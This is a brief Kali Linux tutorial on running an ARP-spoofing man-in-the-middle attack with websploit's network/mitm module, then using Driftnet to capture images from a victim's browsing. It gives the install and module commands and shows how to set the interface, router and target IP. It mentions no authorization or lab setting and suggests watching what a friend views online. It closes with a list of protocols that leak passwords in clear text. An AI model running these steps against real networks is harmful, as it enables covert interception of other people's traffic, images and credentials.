How we can launch an MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step1: Need to install websploit in kali if not present.

[email protected]:~# apt-get install websploit

Step2: To Run the websploit

[email protected]:~# websploit

Step3: Next we need to list the modules with the websploit.

wsf > show modules

Step4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Interface: Need to specify network adapter interface based on our network adapter.

• set Interface eth0
• set Interface wlan0

Router: Need to specify Router IP, can be found with the command route -n.

set Router (Gateway IP)

Target: Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.

Step5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occurs after that sniffers will startup.

wsf:MITM > run

Step6: Now go down to victim machine and start surfing, all the images would be captured by drifnet.

Here you can find the pictures that your friend watching online.

Protocols Vulnerable for Sniffing

• HTTP: Sends passwords in clear text
• TELNET: Transfer commands in plain text
• SNMP: Sends passwords in clear text
• POP: Sends passwords in clear text
• FTP: Sends passwords in clear text
• NNTP: Sends passwords in clear text
• IMAP: Sends passwords in clear text

If you any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with kali Linux

• MITM attack over HTTPS connection with SSLStrip.
• Sniffing as easy as possible with Ettercap.
• How to perform Information Gathering in Kali using NMAP – A Detailed Explanation.